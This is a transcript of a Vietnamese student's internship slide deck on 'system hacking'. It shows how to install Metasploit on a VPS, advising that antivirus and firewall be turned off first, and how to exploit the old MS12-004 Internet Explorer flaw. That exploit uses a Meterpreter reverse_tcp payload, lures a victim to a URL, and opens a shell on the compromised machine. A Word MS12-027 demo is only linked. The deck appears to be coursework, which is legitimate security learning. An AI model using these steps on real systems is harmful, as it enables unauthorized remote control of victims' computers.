bao caocuoiki
TRANSCRIPT
![Page 1: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/1.jpg)
Báo cáo thực tập Cuối kỳ
Đề tài: System Hacking
Sinh viên:Trần Văn VịnhNguyễn Minh
Tiến
![Page 2: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/2.jpg)
Mục tiêu:Thực hiện tấn công máy Victeam thông qua máy
chủ ảo VPS.
Nội dung:- Cài đặt Metasploit Framework trên VPS.
- Khai thác lỗi Internet Explorer thông qua VPS (ms12_004).
- Khai thác lỗi Microsoft Word MS12_027 qua VPS.
- Demo lỗi.- Cảm nhận và kinh nghiệm rút ra sau kì thực tập.
![Page 3: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/3.jpg)
I. Setup MSF trên VPSBước 1 : Truy cập vào VPS bằng Remote
Desktop Connection
![Page 4: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/4.jpg)
Bước 2 : Download và cài đặt MSF trên VPS qua trang chủ: http://www.metasploit.com
I. Setup MSF trên VPS
![Page 5: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/5.jpg)
Sau khi tải về ta chạy file setup đúng với HDH của VPS.Lưu ý : Tắt các chương trình diệt virus và firewall trước khi cài .
Kết quả khi hoàn thành cài đặt
I. Setup MSF trên VPS
![Page 6: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/6.jpg)
II. Khai thác lỗi Internet Explorer ms12_004
Đầu tiên ta đăng nhập vào máy chủ ảo VPS và chạy MSF
![Page 7: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/7.jpg)
Gõ search ms12_024 để tìm mã lỗi
II. Khai thác lỗi Internet Explorer ms12_004
![Page 8: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/8.jpg)
Use exploit/windows/brower/ms12_004_midi
II. Khai thác lỗi Internet Explorer ms12_004
![Page 9: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/9.jpg)
Set payload windows/meterpreter/reverse_tcp
II. Khai thác lỗi Internet Explorer ms12_004
![Page 10: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/10.jpg)
Set srvhost và lhost = “ ip của máy tấn công “.
(ở đây là ip của máy chủ ảo VPS)
II. Khai thác lỗi Internet Explorer ms12_004
![Page 11: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/11.jpg)
Set uripath =” đường dẫn “ .
II. Khai thác lỗi Internet Explorer ms12_004
![Page 12: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/12.jpg)
Và exploit để khởi động server
II. Khai thác lỗi Internet Explorer ms12_004
![Page 13: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/13.jpg)
Lấy máy nạn nhân truy cập vào đường dẫn mà ta đã tạo ra
II. Khai thác lỗi Internet Explorer ms12_004
![Page 14: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/14.jpg)
Sau một khoảng thời gian => Xâm nhập thành công máy nạn nhân .
II. Khai thác lỗi Internet Explorer ms12_004
![Page 15: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/15.jpg)
Dùng lệnh sessions –I “ id của session muốn vào “ để thực hiện tấn công .
Lệnh sysinfo để xem thông tin máy và lệnh shell để điều khiển cmd của máy nạn nhân .
II. Khai thác lỗi Internet Explorer ms12_004
![Page 16: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/16.jpg)
III. Khai thác lỗi Office word MS12_027
Demo chương trình:
https://www.youtube.com/watch?v=IH11i482w5o
![Page 17: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/17.jpg)
IV. Cảm nhận và kinh nghiệm rút ra sau kì thực tập
Bổ ích và lý thú
Cảm nhận
Đem lại nhiều kinh
nghiệm
Môi trường làm việc
thân thiện
Thầy cô tận tình với SV
![Page 18: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/18.jpg)
Kinh nghiệm rút ra:- Làm việc theo nhóm giúp hoàn thành công việc
hiệu quả và dễ dàng hơn.- Nâng cao được khả năng tìm hiểu, chọn lọc thông
tin cần thiết đối với đề tài của mình.- Nâng cao khả năng làm việc độc lập, biết
cách tư duy chín chắn để có thể tự khắc phục 1 số lỗi cần thiết.
IV. Cảm nhận và kinh nghiệm rút ra sau kì thực tập
![Page 19: Bao caocuoiki](https://reader036.vdocuments.net/reader036/viewer/2022081420/55907e271a28abbf518b459a/html5/thumbnails/19.jpg)
Cám ơn thầy và các bạn đã lắng nghe